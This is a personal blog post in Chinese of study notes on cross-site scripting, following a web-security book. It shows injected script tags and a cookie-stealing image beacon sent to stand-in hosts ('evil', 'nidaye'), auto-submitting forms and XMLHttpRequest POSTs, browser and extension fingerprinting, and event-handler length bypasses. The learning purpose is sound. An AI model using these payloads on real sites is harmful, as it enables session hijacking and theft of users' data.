<!DOCTYPE html>
<html lang="en">

<!-- Head tag (contains Google-Analytics、Baidu-Tongji)-->
<head>
  <!-- Google Analytics -->
  
  <!-- Global site tag (gtag.js) - Google Analytics -->
  <script async="async" src="https://www.googletagmanager.com/gtag/js?id=UA-xxxxxx-xx"></script>
  <script type="text/javascript">
    window.dataLayer = window.dataLayer || [];

    function gtag() {
      dataLayer.push(arguments);
    }
    gtag('js', new Date());

    gtag('config', 'UA-xxxxxx-xx');
  </script>
  

  <!-- Baidu Tongji -->
  
  <script type="text/javascript">
    // Originial
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>
  

  <!-- Baidu Push -->
  
  <script>
    (function() {
      var bp = document.createElement('script');
      var curProtocol = window.location.protocol.split(':')[0];
      if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
      } else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
      }
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(bp, s);
    })();
  </script>
  

  <meta charset="utf-8" />
  <meta http-equiv="X-UA-Compatible" content="IE=edge" />

  <meta name="google-site-verification" content="lxDfCplOZbIzjhG34NuQBgu2gdyRlAtMB4utP5AgEBc" />
  <meta name="baidu-site-verification" content="PpzM9WxOJU" />

  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="description" content="九日，要努力变强~" />
  <meta name="keyword" content="九日,gungnir,jiuri,朱冠旭,gungnir&#39;s blog,js,web" />
  <link rel="shortcut icon" href="/img/avatar/roguerabbit.jpg" />

  <!-- Place this tag in your head or just before your close body tag. -->
  <script async="async" defer="defer" src="https://buttons.github.io/buttons.js"></script>
  <!-- Bootstrap Core CSS -->
  <link rel="stylesheet" href="/css/bootstrap.min.css" />

  <!-- Custom CSS -->
  <link rel="stylesheet" href="/css/beantech.min.css" />

  <!-- Pygments Highlight CSS -->
  
<link rel="stylesheet" href="../../../../css/highlight.css">
<link rel="stylesheet" href="../../../../css/widget.css">
<link rel="stylesheet" href="../../../../css/rocket.css">
<link rel="stylesheet" href="../../../../css/signature.css">
<link rel="stylesheet" href="../../../../css/catalog.css">
<link rel="stylesheet" href="../../../../css/livemylife.css">


  
  <!-- wave start -->
  <link rel="stylesheet" href="/css/wave.css" />
  <!-- wave end -->
  

  
  <!-- top start (article top hot config) -->
  <link rel="stylesheet" href="/css/top.css" />
  <!-- top end -->
  

  
  <!-- ThemeColor start -->
  <link rel="stylesheet" href="/css/scroll.css" />
  <!-- ThemeColor end -->
  

  
  <!-- viewer start (Picture preview) -->
  <link rel="stylesheet" href="/css/viewer.min.css" />
  <!-- viewer end -->
  

  
  <!-- Search start -->
  <link rel="stylesheet" href="/css/search.css" />
  <!-- Search end -->
  

  
  <!-- ThemeColor start -->
  <link rel="stylesheet" href="/css/themecolor.css" />
  <!-- ThemeColor end -->
  

  

  
  <!-- gitalk start -->
  <!-- <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.css"> -->
  <link rel="stylesheet" href="/css/gitalk.css" />
  <!-- gitalk end -->
  

  <!-- Custom Fonts -->
  <!-- <link href="https://maxcdn.bootstrapcdn.com/font-awesome/4.3.0/css/font-awesome.min.css" rel="stylesheet" type="text/css"> -->
  <!-- Hux change font-awesome CDN to qiniu -->
  <link rel="stylesheet" href="https://cdn.staticfile.org/font-awesome/4.5.0/css/font-awesome.min.css" type="text/css">
  <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet">

  <!-- Hux Delete, sad but pending in China <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'> <link
    href='http://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800' rel='stylesheet' type='text/ css'> -->

  <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
  <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
  <!--[if lt IE 9]> <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script> <script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script> <![endif]-->

  <!-- ga & ba script hoook -->
  <link rel="canonical" href="http://yoursite-url/2021/02/28/跨站脚本攻击XSS的学习/">
  <title>
    
    跨站脚本攻击XSS的学习 - gungnir | 九日
    
  </title>
<meta name="generator" content="Hexo 4.2.1"></head>


<!-- hack iOS CSS :active style -->

<body ontouchstart="" class="body--home">
	<!-- ThemeColor -->
	
	<!-- ThemeColor -->
<!-- <div class="toggle" onclick="document.body.classList.toggle('body--dark')">Switch Color</div> -->

<div class="toggle" onclick="document.body.classList.toggle('body--dark')">
  <i class="mdui-icon material-icons bright-mode"></i>
  <i class="mdui-icon material-icons dark-mode"></i>
</div>

	

	<!-- Gitter -->
	
	<!-- Gitter -->
<!-- Docs:https://gitter.im/?utm_source=left-menu-logo -->
<script>
  ((window.gitter = {}).chat = {}).options = {
    room: 'your-community/your-room'
  };
</script>
<script src="https://sidecar.gitter.im/dist/sidecar.v1.js" async defer></script>

	

	<!-- Navigation (contains search)-->
	<!-- Navigation -->
<nav class="navbar navbar-default navbar-custom navbar-fixed-top">
  <div class="container-fluid">
    <!-- Brand and toggle get grouped for better mobile display -->
    <div class="navbar-header page-scroll">
      <button type="button" class="navbar-toggle">
        <span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
      <a class="navbar-brand" href="/">gungnir&#39;s blog</a>
    </div>

    <!-- Collect the nav links, forms, and other content for toggling -->
    <!-- Known Issue, found by Hux:
            <nav>'s height woule be hold on by its content.
            so, when navbar scale out, the <nav> will cover tags.
            also mask any touch event of tags, unfortunately.
        -->
    <div id="huxblog_navbar">
      <div class="navbar-collapse">
        <ul class="nav navbar-nav navbar-right">
          <li>
            <a href="/">Home</a>
          </li>

          

          
          

          
          <li>
            <a href="/about/">About</a>
          </li>
          
          

          
          <li>
            <a href="/categories/">Categories</a>
          </li>
          
          

          
          <li>
            <a href="/archive/">Archives</a>
          </li>
          
          

          
          <li>
            <a href="/tags/">Tags</a>
          </li>
          
          

          
          <li><a class="popup-trigger" title="Search"><span class="search-icon"></span>Search</a></li>
          
        </ul>
      </div>
    </div>
    <!-- /.navbar-collapse -->
  </div>
  <!-- /.container -->
</nav>
<!-- progress -->
<div id="progress">
  <div class="line" style="width: 0%;"></div>
</div>


<script>
  // Drop Bootstarp low-performance Navbar
  // Use customize navbar with high-quality material design animation
  // in high-perf jank-free CSS3 implementation
  var $body = document.body;
  var $toggle = document.querySelector('.navbar-toggle');
  var $navbar = document.querySelector('#huxblog_navbar');
  var $collapse = document.querySelector('.navbar-collapse');

  $toggle.addEventListener('click', handleMagic)

  function handleMagic(e) {
    if ($navbar.className.indexOf('in') > 0) {
      // CLOSE
      $navbar.className = " ";
      // wait until animation end.
      setTimeout(function() {
        // prevent frequently toggle
        if ($navbar.className.indexOf('in') < 0) {
          $collapse.style.height = "0px"
        }
      }, 400)
    } else {
      // OPEN
      $collapse.style.height = "auto"
      $navbar.className += " in";
    }
  }
</script>


	<!-- Post Header (contains intro-header、signature、wordcount、busuanzi、waveoverlay) -->
	<!-- Modified by Yu-Hsuan Yen -->
<!-- Post Header -->

  <!-- CDN: jsdelivr start -->
  <style type="text/css">
    header.intro-header {
       /*post*/
        background-image: url('https://cdn.jsdelivr.net/gh/urdr-gungnir/urdr-gungnir.github.io/img/header_img/lml_bg.jpg');
      
    }

    
      #signature {/*signature*/
        background-image: url('/img/signature/vincent-white.png');
      }
    
  </style>
  <!-- CDN: jsdelivr end -->





<header class="intro-header">
  <!-- Signature -->
  <div id="signature">
    <div class="container">
      <div class="row">
        <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
          
          <div class="post-heading">
            <div class="tags">
              
              <a class="tag" href="/tags/#WEB" title="WEB">WEB</a>
              
              <a class="tag" href="/tags/#白帽子讲WEB安全" title="白帽子讲WEB安全">白帽子讲WEB安全</a>
              
            </div>
            <h1>跨站脚本攻击XSS的学习</h1>
            <h2 class="subheading">白帽子讲WEB安全</h2>
            <span class="meta">
              Posted by gungnir on
              2021-02-28
            </span>


            
            <!-- WordCount start -->
            <div class="blank_box"></div>
            <span class="meta">
              Estimated Reading Time <span class="post-count">17</span> Minutes
            </span>
            <div class="blank_box"></div>
            <span class="meta">
              Words <span class="post-count">4.2k</span> In Total
            </span>
            <div class="blank_box"></div>
            <!-- WordCount end -->
            
            
            <!-- 不蒜子统计 start -->
            <span class="meta" id="busuanzi_container_page_pv">
              Viewed <span id="busuanzi_value_page_pv"><i class="fa fa-spinner fa-spin"></i></span> Times
            </span>
            <!-- 不蒜子统计 end -->
            


          </div>
          
        </div>
      </div>
    </div>
  </div>

  
  <!-- waveoverlay start -->
  <div class="preview-overlay">
    <svg class="preview-waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto">
      <defs>
        <path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z"></path>
      </defs>
      <g class="preview-parallax">
        <use xlink:href="#gentle-wave" x="48" y="0" fill=var(--gentle-wave1)></use>
        <use xlink:href="#gentle-wave" x="48" y="3" fill=var(--gentle-wave2)></use>
        <use xlink:href="#gentle-wave" x="48" y="5" fill=var(--gentle-wave3)></use>
        <use xlink:href="#gentle-wave" x="48" y="7" fill=var(--gentle-wave)></use>
      </g>
    </svg>
  </div>
  <!-- waveoverlay end -->
  

</header>



	<!-- Main Content (Post contains
	Pager、
	tip、
	socialshare、
	gitalk、gitment、disqus-comment、
	Catalog、
	Sidebar、
	Featured-Tags、
	Friends Blog、
	anchorjs、
	) -->
	<!-- Modify by Yu-Hsuan Yen -->
<!-- Post Content -->
<article>
  <div class="container">
    <div class="row">
      <!-- Post Container -->
      <div class="col-lg-8 col-lg-offset-1 col-md-10 col-md-offset-1 post-container">

        <h1 id="《白帽子讲web安全》XSS深度学习"><a href="#《白帽子讲web安全》XSS深度学习" class="headerlink" title="《白帽子讲web安全》XSS深度学习"></a>《白帽子讲web安全》XSS深度学习</h1><p>—-连载中</p>
<h2 id="1-XSS简介"><a href="#1-XSS简介" class="headerlink" title="1.XSS简介"></a>1.XSS简介</h2><p>分为三种</p>
<ul>
<li>反射型</li>
<li>存储型</li>
<li>DOM based XSS</li>
</ul>
<h2 id="2-XSS-payload初探"><a href="#2-XSS-payload初探" class="headerlink" title="2.XSS payload初探"></a>2.XSS payload初探</h2><h3 id="2-1窃取cookie"><a href="#2-1窃取cookie" class="headerlink" title="2.1窃取cookie"></a>2.1窃取cookie</h3><p>XSS payload实际是js脚本（也可以是Flase或者其他客户端的脚本）</p>
<p>最常见经典的XSS payload就是cookie劫持</p>
<p>我先是写了个简单的html页面，模拟已经被XSS攻击了，想要去窃取cookie</p>
<p>但是还没弄明白如何设置cookie，而我直接在script中设置下面语句是不管用的</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">document</span>.cookie = <span class="string">"name="</span> + <span class="string">"adasdad"</span>;</span><br></pre></td></tr></table></figure>

<p>所以，脚本运行并没有内容出现</p>
<p><img src="image-20210222161650923.png" alt="image-20210222161650923"></p>
<p>所以，我找到之前做的一道题，存在XSS漏洞，下面为源码</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE <span class="meta-keyword">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">title</span>&gt;</span>My TODO List<span class="tag">&lt;/<span class="name">title</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">meta</span> <span class="attr">name</span>=<span class="string">"viewport"</span> <span class="attr">content</span>=<span class="string">"width=device-width, initial-scale=1.0"</span>&gt;</span></span><br><span class="line">    <span class="comment">&lt;!-- Bootstrap --&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">link</span> <span class="attr">href</span>=<span class="string">"//cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.3.7/css/bootstrap.min.css"</span> <span class="attr">rel</span>=<span class="string">"stylesheet"</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line">    </span><br><span class="line">    <span class="tag">&lt;<span class="name">nav</span> <span class="attr">class</span>=<span class="string">"navbar navbar-inverse container"</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">div</span> <span class="attr">class</span>=<span class="string">"navbar-header"</span>&gt;</span> <span class="tag">&lt;<span class="name">a</span> <span class="attr">class</span>=<span class="string">"navbar-brand"</span> <span class="attr">href</span>=<span class="string">"/"</span>&gt;</span>TodoList<span class="tag">&lt;/<span class="name">a</span>&gt;</span> <span class="tag">&lt;/<span class="name">div</span>&gt;</span></span><br><span class="line">        <span class="comment">&lt;!-- logout links --&gt;</span></span><br><span class="line">        </span><br><span class="line">            <span class="tag">&lt;<span class="name">ul</span> <span class="attr">class</span>=<span class="string">"nav navbar-nav pull-right"</span>&gt;</span></span><br><span class="line">                <span class="tag">&lt;<span class="name">li</span>&gt;</span><span class="tag">&lt;<span class="name">a</span> <span class="attr">class</span>=<span class="string">"btn"</span> <span class="attr">href</span>=<span class="string">"/logout"</span>&gt;</span>Logout<span class="tag">&lt;/<span class="name">a</span>&gt;</span><span class="tag">&lt;/<span class="name">li</span>&gt;</span></span><br><span class="line">            <span class="tag">&lt;/<span class="name">ul</span>&gt;</span></span><br><span class="line">        </span><br><span class="line">    <span class="tag">&lt;/<span class="name">nav</span>&gt;</span></span><br><span class="line"></span><br><span class="line">    </span><br><span class="line">    <span class="tag">&lt;<span class="name">div</span> <span class="attr">class</span>=<span class="string">"container"</span>&gt;</span></span><br><span class="line">        <span class="comment">&lt;!-- flash message --&gt;</span></span><br><span class="line">        </span><br><span class="line"></span><br><span class="line">        <span class="comment">&lt;!-- body block --&gt;</span></span><br><span class="line">        </span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">div</span> <span class="attr">class</span>=<span class="string">"row"</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">h4</span> <span class="attr">class</span>=<span class="string">"modal-title"</span> <span class="attr">id</span>=<span class="string">"myModalLabel"</span> <span class="attr">align</span>=<span class="string">"center"</span>&gt;</span>当前Todo: <span class="tag">&lt;/<span class="name">h4</span>&gt;</span><span class="tag">&lt;<span class="name">br</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">h4</span> <span class="attr">class</span>=<span class="string">"modal-title"</span> <span class="attr">id</span>=<span class="string">"myModalLabel"</span> <span class="attr">align</span>=<span class="string">"center"</span>&gt;</span>是否完成:  未完成 <span class="tag">&lt;/<span class="name">h4</span>&gt;</span><span class="tag">&lt;<span class="name">br</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">h4</span> <span class="attr">class</span>=<span class="string">"modal-title"</span> <span class="attr">id</span>=<span class="string">"myModalLabel"</span> <span class="attr">align</span>=<span class="string">"center"</span>&gt;</span>创建时间: 20210222<span class="tag">&lt;/<span class="name">h4</span>&gt;</span><span class="tag">&lt;<span class="name">br</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">a</span> <span class="attr">href</span>=<span class="string">"/"</span> <span class="attr">style</span>=<span class="string">"max-width: 54px;"</span> <span class="attr">class</span>=<span class="string">"btn btn-warning center-block"</span> <span class="attr">role</span>=<span class="string">"button"</span>&gt;</span>返回<span class="tag">&lt;/<span class="name">a</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">div</span>&gt;</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    <span class="tag">&lt;/<span class="name">div</span>&gt;</span></span><br><span class="line"></span><br><span class="line">    </span><br><span class="line">    <span class="tag">&lt;<span class="name">script</span> <span class="attr">src</span>=<span class="string">"//cdnjs.cloudflare.com/ajax/libs/jquery/1.12.4/jquery.min.js"</span>&gt;</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">script</span> <span class="attr">src</span>=<span class="string">"//cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.3.7/js/bootstrap.min.js"</span>&gt;</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>下面是注入的点</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">h4</span> <span class="attr">class</span>=<span class="string">"modal-title"</span> <span class="attr">id</span>=<span class="string">"myModalLabel"</span> <span class="attr">align</span>=<span class="string">"center"</span>&gt;</span>当前Todo:<span class="tag">&lt;/<span class="name">h4</span>&gt;</span><span class="tag">&lt;<span class="name">br</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>我写入XSSpayload后，变成</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;h4 <span class="class"><span class="keyword">class</span></span>=<span class="string">"modal-title"</span> id=<span class="string">"myModalLabel"</span> align=<span class="string">"center"</span>&gt;当前Todo:&lt;<span class="regexp">/h4&gt;&lt;script src="http:/</span><span class="regexp">/evil/</span>XSS/steal-cookie.js<span class="string">"&gt;&lt;/script&gt;&lt;!--&lt;/h4&gt;&lt;br&gt;</span></span><br></pre></td></tr></table></figure>

<p>注入我在本地写的一个js脚本</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> img = <span class="built_in">document</span>.createElement(<span class="string">"img"</span>);</span><br><span class="line">img.src = <span class="string">"http://nidaye/laaa?"</span> + <span class="built_in">escape</span>(<span class="built_in">document</span>.cookie);<span class="comment">//将cookie写在host之后，作为参数提交</span></span><br><span class="line"><span class="built_in">document</span>.body.appendChild(img);<span class="comment">//作为图片插入，然后js向src请求，就会将cookie提交</span></span><br></pre></td></tr></table></figure>

<p>即使没有这个参数，也没关系，因为他如果src是远程服务器，他会在远程服务器中留下日志</p>
<p>由于现在的浏览器都有所防护，所以这里我之前关掉很多防护成功了，但是现在再去复现都被拦截了，这里只是个思路，供大家理解XSS攻击的方式</p>
<h3 id="2-2利用js进行post-get自动提交"><a href="#2-2利用js进行post-get自动提交" class="headerlink" title="2.2利用js进行post/get自动提交"></a>2.2利用js进行post/get自动提交</h3><p>有两种方法</p>
<ul>
<li><p>构造一个表单，直接写HTML代码会简便</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> dd = <span class="built_in">document</span>.createElement(<span class="string">"div"</span>);</span><br><span class="line"><span class="built_in">document</span>.body.appendChild(dd);</span><br><span class="line">dd.innerHTML = <span class="string">'&lt;form action="" method="post" id="xssform" name="mbform"&gt;'</span> </span><br><span class="line">+ <span class="string">'&lt;input type="hidden" value="JIUY" name="OK"&gt;'</span> </span><br><span class="line">+ <span class="string">'&lt;input type="text" value="test" name="mb_test"/&gt;'</span></span><br><span class="line">+ <span class="string">'&lt;/form&gt;'</span></span><br><span class="line"><span class="built_in">document</span>.getElementById(<span class="string">"xssform"</span>).submit();</span><br></pre></td></tr></table></figure>
</li>
<li><p>利用XMLHttpRequest进行提交</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> url = <span class="string">"http://www.host.com"</span>;</span><br><span class="line"><span class="keyword">var</span> posturl = <span class="string">"ck=balabala&amp;jk=baaaaaa"</span>;</span><br><span class="line"><span class="keyword">var</span> ajax = <span class="literal">null</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">//下面为判断是什么浏览器，通过浏览器特殊的函数来判断</span></span><br><span class="line"><span class="keyword">if</span> (<span class="built_in">window</span>.XMLHttpRequest) &#123;</span><br><span class="line">    ajax = <span class="keyword">new</span> XMLHttpRequest();</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span> <span class="keyword">if</span> (<span class="built_in">window</span>.ActiveXObject) &#123;</span><br><span class="line">    ajax = <span class="keyword">new</span> ActiveXObject();</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="keyword">return</span> ();</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">ajax.open(<span class="string">"POST"</span>, url, <span class="literal">true</span>);<span class="comment">//此语句是post提交必须语句</span></span><br><span class="line">ajax.setRequestHeader(<span class="string">"Content-Type"</span>, <span class="string">"application/x-www-form-urlencoded"</span>);</span><br><span class="line">ajax.send(posturl);<span class="comment">//send是发送body的必须语句</span></span><br><span class="line"></span><br><span class="line">ajax.onreadystatechange = <span class="function"><span class="keyword">function</span> (<span class="params"></span>) </span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (ajax.readyState == <span class="number">4</span> &amp;&amp; ajax.status == <span class="number">200</span>) &#123;</span><br><span class="line">        alert(<span class="string">"Done!"</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>以上两种方式说明，利用js发送post/get请求是多么容易</p>
</li>
</ul>
<h3 id="（重点插入提示）"><a href="#（重点插入提示）" class="headerlink" title="（重点插入提示）"></a>（重点插入提示）</h3><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (<span class="built_in">window</span>.XMLHttpRequest) &#123;</span><br><span class="line">    ajax = <span class="keyword">new</span> XMLHttpRequest();</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span> <span class="keyword">if</span> (<span class="built_in">window</span>.ActiveXObject) &#123;</span><br><span class="line">    ajax = <span class="keyword">new</span> ActiveXObject();</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="keyword">return</span> ();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>上面的语句是用来简单判断浏览器类型的，几乎这是必备的，所以很重要，如果对浏览器版本要求更高，可以尝试其他的语句，之后会提及</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">ajax.open(<span class="string">"POST"</span>, url, <span class="literal">true</span>);<span class="comment">//此语句是post提交必须语句</span></span><br><span class="line">ajax.setRequestHeader(<span class="string">"Content-Type"</span>, <span class="string">"application/x-www-form-urlencoded"</span>);</span><br><span class="line">ajax.send(posturl);<span class="comment">//send是发送body的必须语句</span></span><br></pre></td></tr></table></figure>

<p>而如果是post或get提交，open和send也是必须的</p>
<h2 id="3-XSS-payload进阶"><a href="#3-XSS-payload进阶" class="headerlink" title="3.XSS payload进阶"></a>3.XSS payload进阶</h2><h3 id="3-1识别用户的浏览器"><a href="#3-1识别用户的浏览器" class="headerlink" title="3.1识别用户的浏览器"></a>3.1识别用户的浏览器</h3><p>收集用户信息的时候，要知道用户使用的浏览器、操作系统等内容，XSS能帮助攻击者快速达到收集信息的目的。</p>
<p>那如何通过javascript脚本识别浏览器版本呢？</p>
<p>最直接简单的就是</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">alert(navigator.userAgent)；</span><br></pre></td></tr></table></figure>

<p>但是域名可以伪造，所以这种方法不一定能拿到真实的信息</p>
<p>还有一种方法可以更精准的判断浏览器的信息，一般不会误报</p>
<p>就是利用浏览器之间实现存在差异，不同浏览器会各自实现一些独特的功能，利用这些独特的功能来判断是什么浏览器，这里我就不贴脚本了</p>
<h3 id="3-2识别用户所使用的软件"><a href="#3-2识别用户所使用的软件" class="headerlink" title="3.2识别用户所使用的软件"></a>3.2识别用户所使用的软件</h3><p>除了IE，其他浏览器有个 navigator.plugins对象，它包含了所有的插件</p>
<p><img src="image-20210223144904442.png" alt="image-20210223144904442"></p>
<p>firefox的扩展更加复杂    ，有研究人员相出了一个办法，通过检测扩展的图标，来判断是否存在某个扩展</p>
<p>在firefox中有个协议 </p>
<figure class="highlight dts"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="symbol">chrome:</span><span class="comment">//</span></span><br></pre></td></tr></table></figure>

<p>Friefox的扩展图标，比如说Flash Got的图标，可以这样访问</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">chrome:<span class="comment">//flash/skin/icon32.png</span></span><br></pre></td></tr></table></figure>

<p>只要在js中加载这张图片，如果加载成功，则有这个扩展，如果失败，则没有这个扩展</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> m=<span class="keyword">new</span> Image();</span><br><span class="line">m.onload=<span class="function"><span class="keyword">function</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">    alert(<span class="number">1</span>);</span><br><span class="line">    <span class="comment">//图片存在</span></span><br><span class="line">&#125;</span><br><span class="line">m.onerror=<span class="function"><span class="keyword">function</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">    aleert(<span class="number">2</span>);</span><br><span class="line">    <span class="comment">//图片不存在</span></span><br><span class="line">&#125;</span><br><span class="line">m.src=<span class="string">"chrome://flash/skin/icon32.png"</span>;<span class="comment">//连接图片</span></span><br></pre></td></tr></table></figure>

<h2 id="4-XSS-构造技巧"><a href="#4-XSS-构造技巧" class="headerlink" title="4.XSS 构造技巧"></a>4.XSS 构造技巧</h2><h3 id="4-1绕过长度编码"><a href="#4-1绕过长度编码" class="headerlink" title="4.1绕过长度编码"></a>4.1绕过长度编码</h3><h4 id="事件绕过"><a href="#事件绕过" class="headerlink" title="事件绕过"></a>事件绕过</h4><p>很多时候，会产生XSS的地方就会有<strong>长度限制</strong>，这个限制可能是<strong>服务器逻辑</strong>造成的</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;input type=text value=<span class="string">"$var"</span> /&gt;</span><br></pre></td></tr></table></figure>

<p>我构造这样一个payload</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">“&lt;script&gt;alert(<span class="number">1</span>)&lt;<span class="regexp">/script&gt;</span></span><br></pre></td></tr></table></figure>

<p>那么因为这里有长度限制，可能就会被截断一部分，而发挥不了攻击效果</p>
<p>我们可以利用<strong>事件（Event）</strong>来缩短所需要的字节数：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//将payload改成：</span></span><br><span class="line">onclick=alert(<span class="number">1</span>)</span><br></pre></td></tr></table></figure>
